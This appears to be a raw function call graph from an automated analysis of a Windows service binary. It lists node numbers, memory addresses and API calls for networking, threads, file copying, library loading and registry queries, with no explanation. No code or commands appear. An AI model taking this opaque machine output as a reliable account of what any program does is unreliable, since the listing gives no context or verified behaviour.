57926->57905 57926->57913 57929 7ffe11ec4476 57927->57929 57930 7ffe11ec44a0 57927->57930 57928->57913 57929->57922 57931 7ffe11ec447c WSAGetLastError 57929->57931 57932 7ffe11ec1352 6 API calls 57930->57932 57933 7ffe11ec1352 6 API calls 57931->57933 57932->57913 57933->57913 57935 7ffe11ec4828 57934->57935 57936 7ffe11ec47b4 57934->57936 57937 7ffe11ec1352 6 API calls 57935->57937 57936->57935 57938 7ffe11ec47b9 recv 57936->57938 57941 7ffe11ec47d3 57937->57941 57939 7ffe11ec47dc WSAGetLastError 57938->57939 57940 7ffe11ec47cf 57938->57940 57939->57941 57942 7ffe11ec47f0 57939->57942 57940->57941 57944 7ffe11ec1352 6 API calls 57940->57944 57941->57891 57943 7ffe11ec1352 6 API calls 57942->57943 57943->57941 57944->57941 57945->57891 57946->57889 57948 7ffe11ec3f99 ioctlsocket 57947->57948 57950 7ffe11ec3fcd WSAGetLastError 57948->57950 57951 7ffe11ec3fbc 57948->57951 57952 7ffe11ec1352 6 API calls 57950->57952 57951->57915 57953 7ffe11ec3ed4 setsockopt 57951->57953 57952->57951 57954 7ffe11ec3f09 setsockopt 57953->57954 57955 7ffe11ec3f64 WSAGetLastError 57953->57955 57957 7ffe11ec3f3f WSAGetLastError 57954->57957 57958 7ffe11ec3f35 57954->57958 57956 7ffe11ec1352 6 API calls 57955->57956 57956->57958 57959 7ffe11ec1352 6 API calls 57957->57959 57958->57910 57959->57958 57961 7ffe11ec40f7 57960->57961 57962 7ffe11ec4101 WSAGetLastError 57960->57962 57961->57915 57963 7ffe11ec1352 6 API calls 57962->57963 57963->57961 57965 7ffe11ec1360 57964->57965 57976 7ffe11ecd0c0 57965->57976 57968 7ffe11ec13e7 fwrite fflush 57970 7ffe11ec1410 57968->57970 57969 7ffe11ec141c EnterCriticalSection 57971 7ffe11ec1436 LeaveCriticalSection 57969->57971 57972 7ffe11ec1453 57969->57972 57970->57916 57971->57968 57973 7ffe11ec148d CopyFileA 57972->57973 57974 7ffe11ec14c5 57973->57974 57974->57971 57975->57909 57977 7ffe11ecd0e5 57976->57977 57978 7ffe11ecd0ce 57976->57978 57983 7ffe11ece120 fputc 57977->57983 57982 7ffe11ece120 fputc 57978->57982 57981 7ffe11ec13b9 57981->57968 57981->57969 57981->57970 57982->57981 57983->57981 57984 7ffe1338378b 57987 7ffe1338379d 57984->57987 57985 7ffe13383919 57987->57985 57988 7ffe133837de Sleep SleepEx 57987->57988 57989 7ffe13383862 GetProcessHeap HeapAlloc 57987->57989 57997 7ffe13382eca 57987->57997 57988->57987 57990 7ffe13383889 memcpy 57989->57990 57994 7ffe133837fb 57989->57994 57991 7ffe13382072 7 API calls 57990->57991 57993 7ffe133838e9 EnterCriticalSection 57991->57993 57993->57994 57994->57987 57994->57994 57995 7ffe13383837 memcpy 57994->57995 57996 7ffe13383821 LeaveCriticalSection 57994->57996 58008 7ffe13382072 57994->58008 57995->57987 57996->57994 57998 7ffe13382ee4 57997->57998 57999 7ffe13382f58 57997->57999 57998->57999 58000 7ffe13382ee9 recv 57998->58000 58001 7ffe13382072 7 API calls 57999->58001 58002 7ffe13382f0c WSAGetLastError 58000->58002 58004 7ffe13382eff 58000->58004 58003 7ffe13382f03 58001->58003 58002->58003 58005 7ffe13382f20 58002->58005 58003->57987 58004->58003 58007 7ffe13382072 7 API calls 58004->58007 58006 7ffe13382072 7 API calls 58005->58006 58006->58003 58007->58003 58009 7ffe13382080 58008->58009 58019 7ffe1338b130 58009->58019 58012 7ffe1338213c EnterCriticalSection 58015 7ffe13382156 LeaveCriticalSection 58012->58015 58016 7ffe13382173 58012->58016 58013 7ffe13382107 fwrite fflush 58014 7ffe13382130 58013->58014 58014->57994 58015->58013 58017 7ffe133821ad CopyFileA 58016->58017 58018 7ffe133821e5 58017->58018 58018->58015 58020 7ffe1338b13e 58019->58020 58021 7ffe1338b155 58019->58021 58025 7ffe1338c190 fputc strlen 58020->58025 58026 7ffe1338c190 fputc strlen 58021->58026 58024 7ffe133820d9 58024->58012 58024->58013 58024->58014 58025->58024 58026->58024 58027 7ffe126dc415 58034 7ffe126dc422 58027->58034 58028 7ffe126dc632 58029 7ffe126dc443 Sleep 58029->58034 58031 7ffe126dc4bf Sleep 58031->58034 58032 7ffe126dc592 memcpy 58032->58034 58033 7ffe126d77a2 6 API calls 58033->58034 58034->58028 58034->58029 58034->58031 58034->58032 58034->58033 58036 7ffe126dc3ac 8 API calls 58034->58036 58037 7ffe126d61a2 13 API calls 58034->58037 58036->58034 58037->58034 58038 7ff6ef651b75 58068 7ff6ef65161a 58038->58068 58041 7ff6ef651be4 RegisterServiceCtrlHandlerA 58042 7ff6ef651c04 58041->58042 58043 7ff6ef651c25 GetLastError 58041->58043 58087 7ff6ef651360 SetServiceStatus 58042->58087 58045 7ff6ef652ef2 6 API calls 58043->58045 58044 7ff6ef651bac 58146 7ff6ef651a63 10 API calls 58044->58146 58063 7ff6ef651b85 58045->58063 58048 7ff6ef651c19 58088 7ff6ef6516e3 58048->58088 58051 7ff6ef651d18 58125 7ff6ef652ef2 58051->58125 58053 7ff6ef651bb1 58147 7ff6ef651b1c 13 API calls 58053->58147 58056 7ff6ef651d71 58059 7ff6ef651dad ExitProcess 58056->58059 58057 7ff6ef651bb6 58057->58059 58060 7ff6ef651bbe 58057->58060 58058 7ff6ef651d48 58062 7ff6ef652ef2 6 API calls 58058->58062 58064 7ff6ef651bdd 58060->58064 58148 7ff6ef651360 SetServiceStatus 58060->58148 58061 7ff6ef651d32 58061->58058 58136 7ff6ef6519e2 58061->58136 58066 7ff6ef651b8d 58062->58066 58063->58056 58063->58066 58124 7ff6ef651360 SetServiceStatus 58063->58124 58066->58044 58145 7ff6ef651360 SetServiceStatus 58066->58145 58149 7ff6ef651fd0 GetModuleHandleExA 58068->58149 58073 7ff6ef65164c 58086 7ff6ef651650 58073->58086 58211 7ff6ef6528fc 58073->58211 58081 7ff6ef651fd0 8 API calls 58082 7ff6ef6516b0 58081->58082 58083 7ff6ef657689 12 API calls 58082->58083 58084 7ff6ef6516c9 58083->58084 58084->58086 58263 7ff6ef653452 58084->58263 58086->58041 58086->58063 58087->58048 58089 7ff6ef651fd0 8 API calls 58088->58089 58090 7ff6ef65172e 58089->58090 58091 7ff6ef65758b 8 API calls 58090->58091 58092 7ff6ef651743 58091->58092 58093 7ff6ef65174d strlen 58092->58093 58102 7ff6ef651942 58092->58102 58095 7ff6ef65176a 58093->58095 58096 7ff6ef651783 _mbscpy strlen strlen 58093->58096 58094 7ff6ef65197a 58094->58063 58095->58096 58097 7ff6ef65176f strlen 58095->58097 58103 7ff6ef6517ca 58096->58103 58097->58096 58098 7ff6ef651938 58669 7ff6ef654788 FindClose 58098->58669 58100 7ff6ef6547a3 12 API calls 58100->58103 58101 7ff6ef651959 58105 7ff6ef652ef2 6 API calls 58101->58105 58102->58094 58102->58101 58104 7ff6ef652ef2 6 API calls 58102->58104 58581 7ffe133890d0 58102->58581 58592 7ffe126d8a60 58102->58592 58610 7ffe0eb41b80 58102->58610 58623 7ffe0e16ff40 58102->58623 58640 7ffe0e1354b0 58102->58640 58655 7ffe11ec1290 58102->58655 58670 7ff6ef651360 SetServiceStatus 58102->58670 58103->58098 58103->58100 58106 7ff6ef652304 8 API calls 58103->58106 58108 7ff6ef651895 58103->58108 58109 7ff6ef6517ee FreeLibrary 58103->58109 58111 7ff6ef652283 8 API calls 58103->58111 58668 7ff6ef651360 SetServiceStatus 58103->58668 58104->58102 58105->58094 58106->58103 58110 7ff6ef652ef2 6 API calls 58108->58110 58109->58103 58112 7ff6ef6518ad GetProcessHeap HeapAlloc 58110->58112 58111->58103 58114 7ff6ef6518f6 58112->58114 58115 7ff6ef6518cf _mbscpy 58112->58115 58117 7ff6ef652ef2 6 API calls 58114->58117 58115->58114 58116 7ff6ef65191b 58115->58116 58116->58098 58116->58116 58117->58116 58124->58051 58126 7ff6ef652f00 58125->58126 60079 7ff6ef65aa60 58126->60079 58129 7ff6ef652fbc EnterCriticalSection 58131 7ff6ef652fd6 LeaveCriticalSection 58129->58131 58133 7ff6ef652ff3 58129->58133 58130 7ff6ef652f87 fwrite fflush 58132 7ff6ef652fb0 58130->58132 58131->58130 58132->58061 58134 7ff6ef65302d CopyFileA 58133->58134 58135 7ff6ef653065 58134->58135 58135->58131 58137 7ff6ef651fd0 8 API calls 58136->58137 58138 7ff6ef651a11 58137->58138 58139 7ff6ef65758b 8 API calls 58138->58139 58141 7ff6ef651a23 58139->58141 58140 7ff6ef651a29 58140->58061 58141->58140 58142 7ff6ef6513cd 20 API calls 58141->58142 58143 7ff6ef651a3f 58142->58143 58143->58140 58144 7ff6ef651a4c SleepEx 58143->58144 58144->58140 58145->58044 58146->58053 58147->58057 58148->58064 58150 7ff6ef652002 GetLastError 58149->58150 58152 7ff6ef65162f 58149->58152 58151 7ff6ef652ef2 6 API calls 58150->58151 58151->58152 58153 7ff6ef657689 58152->58153 58154 7ff6ef6576cf 58153->58154 58155 7ff6ef65769f 58153->58155 58156 7ff6ef652ef2 6 API calls 58154->58156 58286 7ff6ef65758b 58155->58286 58162 7ff6ef651648 58156->58162 58159 7ff6ef6576ff strlen 58160 7ff6ef657727 _mbscat strlen 58159->58160 58161 7ff6ef657711 58159->58161 58160->58162 58161->58160 58163 7ff6ef657716 strlen 58161->58163 58162->58073 58164 7ff6ef65685f 58162->58164 58163->58160 58165 7ff6ef656876 58164->58165 58166 7ff6ef656962 58164->58166 58168 7ff6ef656992 58165->58168 58169 7ff6ef65687f CreateFileA 58165->58169 58167 7ff6ef652ef2 6 API calls 58166->58167 58170 7ff6ef656917 58167->58170 58171 7ff6ef652ef2 6 API calls 58168->58171 58172 7ff6ef6568ca LockFileEx 58169->58172 58173 7ff6ef6569c5 GetLastError 58169->58173 58179 7ff6ef656c29 58170->58179 58180 7ff6ef656941 58170->58180 58171->58170 58175 7ff6ef656aaa GetLastError 58172->58175 58176 7ff6ef6568fe 58172->58176 58174 7ff6ef652ef2 6 API calls 58173->58174 58184 7ff6ef6569e6 58174->58184 58177 7ff6ef652ef2 6 API calls 58175->58177 58176->58170 58178 7ff6ef656c1b CloseHandle 58176->58178 58186 7ff6ef656acb 58177->58186 58178->58179 58181 7ff6ef652ef2 6 API calls 58179->58181 58182 7ff6ef652ef2 6 API calls 58180->58182 58183 7ff6ef651669 58181->58183 58182->58183 58183->58086 58187 7ff6ef65309c InitializeCriticalSectionAndSpinCount 58183->58187 58184->58175 58185 7ff6ef656b53 58184->58185 58185->58178 58186->58185 58188 7ff6ef6530ca 58187->58188 58189 7ff6ef6531ed GetLastError 58187->58189 58190 7ff6ef651fd0 8 API calls 58188->58190 58191 7ff6ef652ef2 6 API calls 58189->58191 58192 7ff6ef6530e6 58190->58192 58198 7ff6ef6531c6 58191->58198 58193 7ff6ef65758b 8 API calls 58192->58193 58194 7ff6ef6530fa 58193->58194 58195 7ff6ef653104 strlen 58194->58195 58194->58198 58196 7ff6ef65311d 58195->58196 58197 7ff6ef653133 58195->58197 58196->58197 58200 7ff6ef653122 strlen 58196->58200 58201 7ff6ef653158 strlen fopen 58197->58201 58202 7ff6ef653138 _mbscat strlen 58197->58202 58199 7ff6ef652ef2 6 API calls 58198->58199 58210 7ff6ef6531e3 58199->58210 58200->58197 58203 7ff6ef6532ba 58201->58203 58204 7ff6ef6531a4 58201->58204 58202->58201 58205 7ff6ef652ef2 6 API calls 58203->58205 58206 7ff6ef652ef2 6 API calls 58204->58206 58205->58198 58207 7ff6ef6531be 58206->58207 58207->58198 58208 7ff6ef65332a 58207->58208 58209 7ff6ef652ef2 6 API calls 58208->58209 58209->58210 58210->58073 58300 7ff6ef652304 58211->58300 58215 7ff6ef652963 FreeLibrary 58218 7ff6ef6529c3 GetNativeSystemInfo GetWindowsDirectoryA 58215->58218 58226 7ff6ef652999 58215->58226 58217 7ff6ef652ef2 6 API calls 58219 7ff6ef65167e 58217->58219 58221 7ff6ef652a02 GetLastError 58218->58221 58222 7ff6ef652ae0 58218->58222 58219->58086 58246 7ff6ef6514ef 58219->58246 58225 7ff6ef652ef2 6 API calls 58221->58225 58223 7ff6ef652ef2 6 API calls 58222->58223 58227 7ff6ef652b01 58223->58227 58224 7ff6ef652ef2 6 API calls 58224->58215 58225->58226 58226->58217 58227->58226 58316 7ff6ef659242 58227->58316 58229 7ff6ef652ef2 6 API calls 58236 7ff6ef652b3d 58229->58236 58230 7ff6ef652b4d GetVolumeInformationA 58231 7ff6ef652ca7 58230->58231 58232 7ff6ef652bb0 GetLastError 58230->58232 58233 7ff6ef652ef2 6 API calls 58231->58233 58234 7ff6ef652ef2 6 API calls 58232->58234 58235 7ff6ef652cc4 58233->58235 58234->58236 58236->58226 58236->58229 58236->58230 58247 7ff6ef651fd0 8 API calls 58246->58247 58248 7ff6ef651534 58247->58248 58249 7ff6ef65758b 8 API calls 58248->58249 58250 7ff6ef651546 58249->58250 58251 7ff6ef65154c _mbscpy 58250->58251 58252 7ff6ef651576 58250->58252 58343 7ff6ef6513cd strlen 58251->58343 58254 7ff6ef652ef2 6 API calls 58252->58254 58257 7ff6ef6515a1 58254->58257 58255 7ff6ef651572 58255->58252 58259 7ff6ef6515f1 58255->58259 58257->58081 58257->58086 58261 7ff6ef652ef2 6 API calls 58259->58261 58261->58257 58264 7ff6ef65347a 58263->58264 58265 7ff6ef653505 58263->58265 58267 7ff6ef654fc5 30 API calls 58264->58267 58266 7ff6ef652ef2 6 API calls 58265->58266 58268 7ff6ef653493 58266->58268 58278 7ff6ef653489 58267->58278 58269 7ff6ef65349d GetProcessHeap HeapFree 58268->58269 58270 7ff6ef6534b4 58268->58270 58269->58270 58271 7ff6ef6537f2 58270->58271 58276 7ff6ef6534dc 58270->58276 58273 7ff6ef6535bd GetProcessHeap HeapAlloc 58274 7ff6ef653630 58273->58274 58282 7ff6ef6535fa 58273->58282 58278->58268 58278->58273 58282->58268 58287 7ff6ef65759c 58286->58287 58288 7ff6ef6575d2 58286->58288 58289 7ff6ef657602 58287->58289 58290 7ff6ef6575a1 58287->58290 58291 7ff6ef652ef2 6 API calls 58288->58291 58294 7ff6ef652ef2 6 API calls 58289->58294 58292 7ff6ef6575aa 58290->58292 58293 7ff6ef657632 58290->58293 58297 7ff6ef6575b7 58291->58297 58299 7ff6ef65744c 8 API calls 58292->58299 58295 7ff6ef652ef2 6 API calls 58293->58295 58294->58297 58295->58297 58297->58159 58297->58162 58298 7ff6ef6575af 58298->58297 58299->58298 58301 7ff6ef65233b 58300->58301 58302 7ff6ef652312 LoadLibraryA 58300->58302 58303 7ff6ef65233e GetLastError 58301->58303 58302->58303 58304 7ff6ef652320 58302->58304 58306 7ff6ef652ef2 6 API calls 58303->58306 58305 7ff6ef652ef2 6 API calls 58304->58305 58307 7ff6ef652339 58305->58307 58306->58307 58307->58226 58308 7ff6ef652283 58307->58308 58309 7ff6ef6522a0 GetProcAddress 58308->58309 58310 7ff6ef6522d1 58308->58310 58311 7ff6ef6522d6 GetLastError 58309->58311 58312 7ff6ef6522b1 58309->58312 58310->58311 58314 7ff6ef652ef2 6 API calls 58311->58314 58313 7ff6ef652ef2 6 API calls 58312->58313 58315 7ff6ef6522cf 58313->58315 58314->58315 58315->58215 58315->58224 58317 7ff6ef65926b 58316->58317 58335 7ff6ef6592ca 58316->58335 58319 7ff6ef65932d 58317->58319 58320 7ff6ef659274 58317->58320 58318 7ff6ef652ef2 6 API calls 58338 7ff6ef659323 58318->58338 58321 7ff6ef652ef2 6 API calls 58319->58321 58322 7ff6ef65927d 58320->58322 58323 7ff6ef659360 58320->58323 58321->58338 58325 7ff6ef659286 RegOpenKeyExA 58322->58325 58326 7ff6ef659393 58322->58326 58324 7ff6ef652ef2 6 API calls 58323->58324 58324->58338 58327 7ff6ef6592ad 58325->58327 58328 7ff6ef6593c6 RegQueryValueExA 58325->58328 58329 7ff6ef652ef2 6 API calls 58326->58329 58331 7ff6ef652ef2 6 API calls 58327->58331 58341 7ff6ef6593f4 58328->58341 58342 7ff6ef659447 RegCloseKey 58328->58342 58329->58338 58330 7ff6ef6596c9 58332 7ff6ef652ef2 6 API calls 58330->58332 58331->58335 58336 7ff6ef659569 58332->58336 58334 7ff6ef6596ec 58335->58318 58335->58338 58336->58236 58337 7ff6ef659526 58337->58334 58340 7ff6ef652ef2 6 API calls 58337->58340 58338->58330 58338->58337 58339 7ff6ef652ef2 6 API calls 58339->58341 58340->58336 58341->58339 58341->58342 58342->58338 58344 7ff6ef6513fd strlen 58343->58344 58345 7ff6ef6513e7 58343->58345 58396 7ff6ef656e87 58344->58396 58345->58344 58346 7ff6ef6513ec strlen 58345->58346 58346->58344 58348 7ff6ef651436 58348->58255 58356 7ff6ef657750 58348->58356 58350 7ff6ef651425 58350->58348 58351 7ff6ef651487 strlen 58350->58351 58352 7ff6ef6514c8 58350->58352 58355 7ff6ef6514b4 strlen 58350->58355 58402 7ff6ef6547a3 58350->58402 58353 7ff6ef656e87 8 API calls 58351->58353 58426 7ff6ef654788 FindClose 58352->58426 58353->58350 58355->58350 58357 7ff6ef6577f2 58356->58357 58358 7ff6ef657772 58356->58358 58359 7ff6ef652ef2 6 API calls 58357->58359 58360 7ff6ef65777b 58358->58360 58361 7ff6ef657822 58358->58361 58366 7ff6ef6577a6 58359->58366 58427 7ff6ef654fc5 58360->58427 58363 7ff6ef652ef2 6 API calls 58361->58363 58363->58366 58365 7ff6ef657a9e 58366->58365 58368 7ff6ef652ef2 6 API calls 58366->58368 58397 7ff6ef656ea5 58396->58397 58398 7ff6ef656e90 GetFileAttributesA 58396->58398 58400 7ff6ef652ef2 6 API calls 58397->58400 58399 7ff6ef656ed5 GetLastError 58398->58399 58401 7ff6ef656e9b 58398->58401 58399->58401 58400->58401 58401->58350 58403 7ff6ef6547c3 58402->58403 58423 7ff6ef654809 58402->58423 58404 7ff6ef6547cc 58403->58404 58405 7ff6ef654862 58403->58405 58407 7ff6ef65489a 58404->58407 58408 7ff6ef6547d5 58404->58408 58409 7ff6ef652ef2 6 API calls 58405->58409 58406 7ff6ef652ef2 6 API calls 58425 7ff6ef654853 58406->58425 58410 7ff6ef652ef2 6 API calls 58407->58410 58411 7ff6ef6548d2 FindFirstFileA 58408->58411 58412 7ff6ef6547e1 FindNextFileA 58408->58412 58409->58425 58410->58425 58413 7ff6ef6547f7 _mbscpy 58411->58413 58414 7ff6ef6548f3 GetLastError 58411->58414 58412->58413 58415 7ff6ef654922 GetLastError 58412->58415 58413->58423 58423->58406 58423->58425 58425->58350 58426->58348 58428 7ff6ef655065 58427->58428 58429 7ff6ef654fe7 58427->58429 58671 7ffe1338221c InitializeCriticalSectionAndSpinCount 58581->58671 58584 7ffe133890ea 58584->58102 58585 7ffe133890e6 58585->58584 58738 7ffe1338328e WSAStartup 58585->58738 58590 7ffe13389131 58590->58584 58746 7ffe13383aa7 InitializeCriticalSectionAndSpinCount 58590->58746 58880 7ffe126d794c InitializeCriticalSectionAndSpinCount 58592->58880 58595 7ffe126d8a7d 58599 7ffe126d77a2 6 API calls 58595->58599 58600 7ffe126d8a9a 58599->58600 58600->58102 58602 7ffe126d8a79 58602->58595 58949 7ffe126d1fce WSAStartup 58602->58949 58603 7ffe126d8aeb 58603->58595 58957 7ffe126d64f8 InitializeCriticalSectionAndSpinCount 58603->58957 59162 7ffe0eb49f6c InitializeCriticalSectionAndSpinCount 58610->59162 58613 7ffe0eb41b9a 58613->58102 58619 7ffe0eb41b96 58619->58613 59231 7ffe0eb4296e WSAStartup 58619->59231 59389 7ffe0e16c9fc InitializeCriticalSectionAndSpinCount 58623->59389 58626 7ffe0e16ff56 58628 7ffe0e16ff5a 58626->58628 59458 7ffe0e168b63 InitializeCriticalSectionAndSpinCount 58626->59458 58628->58102 59636 7ffe0e13427c InitializeCriticalSectionAndSpinCount 58640->59636 58643 7ffe0e1354c6 58654 7ffe0e1354ca 58643->58654 59705 7ffe0e1362ae WSAStartup 58643->59705 58654->58102 59871 7ffe11ec14fc InitializeCriticalSectionAndSpinCount 58655->59871 58661 7ffe11ec12f1 58667 7ffe11ec12aa 58661->58667 59948 7ffe11ec2b78 InitializeCriticalSectionAndSpinCount 58661->59948 58663 7ffe11ec12a6 58663->58667 59940 7ffe11ec4b5e WSAStartup 58663->59940 58667->58102 58668->58103 58669->58102 58670->58102 58672 7ffe13382370 GetLastError 58671->58672 58673 7ffe1338224a 58671->58673 58674 7ffe13382072 7 API calls 58672->58674 58777 7ffe13384e20 GetModuleHandleExA 58673->58777 58677 7ffe13382349 58674->58677 58683 7ffe13382072 7 API calls 58677->58683 58680 7ffe13382284 strlen 58681 7ffe133822b3 58680->58681 58682 7ffe1338229d 58680->58682 58685 7ffe133822d8 strlen fopen 58681->58685 58686 7ffe133822b8 strcat strlen 58681->58686 58682->58681 58684 7ffe133822a2 strlen 58682->58684 58687 7ffe13382366 58683->58687 58684->58681 58688 7ffe1338243d 58685->58688 58689 7ffe13382327 58685->58689 58686->58685 58687->58585 58695 7ffe13381d84 58687->58695 58690 7ffe13382072 7 API calls 58688->58690 58691 7ffe13382072 7 API calls 58689->58691 58690->58677 58692 7ffe13382341 58691->58692 58692->58677 58693 7ffe133824ad 58692->58693 58696 7ffe13381de9 58695->58696 58697 7ffe13381da6 58695->58697 58698 7ffe13382072 7 API calls 58696->58698 58795 7ffe133819f0 58697->58795 58700 7ffe13381dbf 58698->58700 58700->58584 58705 7ffe1338482c 58700->58705 58702 7ffe13381e19 _errno _strtoui64 _errno 58702->58700 58703 7ffe13381e4c _errno 58702->58703 58704 7ffe13382072 7 API calls 58703->58704 58704->58700 58837 7ffe13385154 58705->58837 58739 7ffe133832d2 58738->58739 58740 7ffe133832aa 58738->58740 58741 7ffe13382072 7 API calls 58739->58741 58742 7ffe13382072 7 API calls 58740->58742 58743 7ffe133832eb 58741->58743 58745 7ffe133832c4 58742->58745 58744 7ffe13382072 7 API calls 58743->58744 58744->58745 58745->58590 58747 7ffe13383c52 GetLastError 58746->58747 58748 7ffe13383ad0 InitializeCriticalSectionAndSpinCount 58746->58748 58749 7ffe13382072 7 API calls 58747->58749 58750 7ffe13383d6e GetLastError 58748->58750 58751 7ffe13383afd 58748->58751 58778 7ffe13384e52 GetLastError 58777->58778 58779 7ffe13382266 58777->58779 58780 7ffe13382072 7 API calls 58778->58780 58781 7ffe1338859b 58779->58781 58780->58779 58782 7ffe133885ac 58781->58782 58783 7ffe133885e2 58781->58783 58785 7ffe133885b1 58782->58785 58786 7ffe13388612 58782->58786 58784 7ffe13382072 7 API calls 58783->58784 58792 7ffe1338227a 58784->58792 58788 7ffe133885ba 58785->58788 58789 7ffe13388642 58785->58789 58787 7ffe13382072 7 API calls 58786->58787 58787->58792 58794 7ffe1338845c 9 API calls 58788->58794 58790 7ffe13382072 7 API calls 58789->58790 58790->58792 58792->58677 58792->58680 58793 7ffe133885bf 58793->58792 58794->58793 58796 7ffe13381a01 58795->58796 58797 7ffe13381a39 58795->58797 58803 7ffe133816d9 58796->58803 58798 7ffe13382072 7 API calls 58797->58798 58800 7ffe13381a18 58798->58800 58800->58700 58800->58702 58804 7ffe133816f1 58803->58804 58805 7ffe1338170c 58803->58805 58806 7ffe1338173f 58804->58806 58807 7ffe133816f6 58804->58807 58808 7ffe13382072 7 API calls 58805->58808 58810 7ffe13382072 7 API calls 58806->58810 58809 7ffe13381772 58807->58809 58816 7ffe133816fb 58807->58816 58815 7ffe13381735 58808->58815 58811 7ffe13382072 7 API calls 58809->58811 58810->58815 58811->58815 58812 7ffe133817dc 58812->58815 58813 7ffe133817b1 strcmp 58813->58816 58818 7ffe13382072 7 API calls 58815->58818 58816->58812 58816->58813 58838 7ffe13385162 LoadLibraryA 58837->58838 58839 7ffe1338518b 58837->58839 58840 7ffe1338518e GetLastError 58838->58840 58841 7ffe13385170 58838->58841 58839->58840 58842 7ffe13382072 7 API calls 58840->58842 58843 7ffe13382072 7 API calls 58841->58843 58881 7ffe126d797a 58880->58881 58882 7ffe126d7aa0 GetLastError 58880->58882 58883 7ffe126d7400 8 API calls 58881->58883 58884 7ffe126d77a2 6 API calls 58882->58884 58885 7ffe126d7996 58883->58885 58892 7ffe126d7a79 58884->58892 58998 7ffe126d5dcb 58885->58998 58888 7ffe126d79b4 strlen 58889 7ffe126d79cd 58888->58889 58890 7ffe126d79e3 58888->58890 58889->58890 58893 7ffe126d79d2 strlen 58889->58893 58894 7ffe126d7a08 strlen fopen 58890->58894 58895 7ffe126d79e8 strcat strlen 58890->58895 58891 7ffe126d77a2 6 API calls 58896 7ffe126d7a96 58891->58896 58892->58891 58893->58890 58897 7ffe126d7b6d 58894->58897 58898 7ffe126d7a57 58894->58898 58895->58894 58896->58602 58904 7ffe126d8774 58896->58904 58899 7ffe126d77a2 6 API calls 58897->58899 58900 7ffe126d77a2 6 API calls 58898->58900 58899->58892 58901 7ffe126d7a71 58900->58901 58901->58892 58902 7ffe126d7bdd 58901->58902 58905 7ffe126d8796 58904->58905 58906 7ffe126d87d9 58904->58906 59012 7ffe126d83e0 58905->59012 58908 7ffe126d77a2 6 API calls 58906->58908 58910 7ffe126d87af 58908->58910 58910->58595 58914 7ffe126d6e0c 58910->58914 58911 7ffe126d8809 _errno _strtoui64 _errno 58911->58910 58912 7ffe126d883c _errno 58911->58912 58913 7ffe126d77a2 6 API calls 58912->58913 58913->58910 59054 7ffe126d7734 58914->59054 58950 7ffe126d1fea 58949->58950 58951 7ffe126d2012 58949->58951 58952 7ffe126d77a2 6 API calls 58950->58952 58953 7ffe126d77a2 6 API calls 58951->58953 58955 7ffe126d2004 58952->58955 58954 7ffe126d202b 58953->58954 58956 7ffe126d77a2 6 API calls 58954->58956 58955->58603 58956->58955 58958 7ffe126d659b GetLastError 58957->58958 58959 7ffe126d651d CreateThread 58957->58959 58961 7ffe126d77a2 6 API calls 58958->58961 58960 7ffe126d6673 GetLastError 58959->58960 58968 7ffe126d6569 58959->58968 58999 7ffe126d5ddc 58998->58999 59000 7ffe126d5e12 58998->59000 59001 7ffe126d5e42 58999->59001 59002 7ffe126d5de1 58999->59002 59003 7ffe126d77a2 6 API calls 59000->59003 59007 7ffe126d77a2 6 API calls 59001->59007 59004 7ffe126d5dea 59002->59004 59005 7ffe126d5e72 59002->59005 59006 7ffe126d5df7 59003->59006 59011 7ffe126d5c8c 8 API calls 59004->59011 59008 7ffe126d77a2 6 API calls 59005->59008 59006->58888 59006->58892 59007->59006 59008->59006 59010 7ffe126d5def 59010->59006 59011->59010 59013 7ffe126d8429 59012->59013 59014 7ffe126d83f1 59012->59014 59016 7ffe126d77a2 6 API calls 59013->59016 59020 7ffe126d80c9 59014->59020 59019 7ffe126d8408 59016->59019 59019->58910 59019->58911 59021 7ffe126d80fc 59020->59021 59022 7ffe126d80e1 59020->59022 59025 7ffe126d77a2 6 API calls 59021->59025 59023 7ffe126d80e6 59022->59023 59024 7ffe126d812f 59022->59024 59026 7ffe126d80eb 59023->59026 59027 7ffe126d8162 59023->59027 59028 7ffe126d77a2 6 API calls 59024->59028 59031 7ffe126d8125 59025->59031 59030 7ffe126d81cc 59026->59030 59032 7ffe126d81a1 strcmp 59026->59032 59029 7ffe126d77a2 6 API calls 59027->59029 59028->59031 59029->59031 59030->59031 59035 7ffe126d77a2 6 API calls 59031->59035 59032->59026 59055 7ffe126d776b 59054->59055 59056 7ffe126d7742 LoadLibraryA 59054->59056 59057 7ffe126d776e GetLastError 59055->59057 59056->59057 59058 7ffe126d7750 59056->59058 59060 7ffe126d77a2 6 API calls 59057->59060 59059 7ffe126d77a2 6 API calls 59058->59059 59163 7ffe0eb4a0c0 GetLastError 59162->59163 59164 7ffe0eb49f9a 59162->59164 59165 7ffe0eb49dc2 6 API calls 59163->59165 59267 7ffe0eb44ac0 GetModuleHandleExA 59164->59267 59174 7ffe0eb4a099 59165->59174 59170 7ffe0eb49fd4 strlen 59172 7ffe0eb4a003 59170->59172 59173 7ffe0eb49fed 59170->59173 59171 7ffe0eb49dc2 6 API calls 59175 7ffe0eb41b92 59171->59175 59177 7ffe0eb4a028 strlen fopen 59172->59177 59178 7ffe0eb4a008 strcat strlen 59172->59178 59173->59172 59176 7ffe0eb49ff2 strlen 59173->59176 59174->59171 59175->58619 59186 7ffe0eb4ad94 59175->59186 59176->59172 59179 7ffe0eb4a18d 59177->59179 59180 7ffe0eb4a077 59177->59180 59178->59177 59182 7ffe0eb49dc2 6 API calls 59179->59182 59284 7ffe0eb49dc2 59180->59284 59182->59174 59187 7ffe0eb4adb6 59186->59187 59188 7ffe0eb4adf9 59186->59188 59304 7ffe0eb4aa00 59187->59304 59190 7ffe0eb49dc2 6 API calls 59188->59190 59192 7ffe0eb41bd1 59190->59192 59192->58613 59196 7ffe0eb444cc 59192->59196 59193 7ffe0eb4ae29 _errno _strtoui64 _errno 59193->59192 59194 7ffe0eb4ae5c _errno 59193->59194 59195 7ffe0eb49dc2 6 API calls 59194->59195 59195->59192 59346 7ffe0eb44df4 59196->59346 59232 7ffe0eb429b2 59231->59232 59233 7ffe0eb4298a 59231->59233 59234 7ffe0eb49dc2 6 API calls 59232->59234 59235 7ffe0eb49dc2 6 API calls 59233->59235 59236 7ffe0eb429cb 59234->59236 59238 7ffe0eb41be1 59235->59238 59237 7ffe0eb49dc2 6 API calls 59236->59237 59237->59238 59238->58613 59239 7ffe0eb417f8 InitializeCriticalSectionAndSpinCount 59238->59239 59240 7ffe0eb4181d CreateThread 59239->59240 59241 7ffe0eb4189b GetLastError 59239->59241 59242 7ffe0eb41973 GetLastError 59240->59242 59250 7ffe0eb41869 59240->59250 59243 7ffe0eb49dc2 6 API calls 59241->59243 59246 7ffe0eb49dc2 6 API calls 59242->59246 59245 7ffe0eb41876 